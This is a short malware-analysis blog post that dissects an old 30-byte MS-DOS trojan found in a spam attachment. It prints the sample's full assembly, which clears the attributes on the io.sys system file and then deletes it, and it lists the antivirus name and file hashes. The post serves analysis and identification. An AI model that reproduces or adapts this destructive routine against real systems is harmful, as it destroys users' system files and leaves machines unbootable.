Redirection:
http://evilcodecave.blogspot.com/2009/09/vista-irp-struct-with-offset-references.html
This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:
seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp
The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).
This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b
File Size: 30 Bytes
MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f
SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835
It’s incredible how old Viruses are still around the web!
See you to the next post 🙂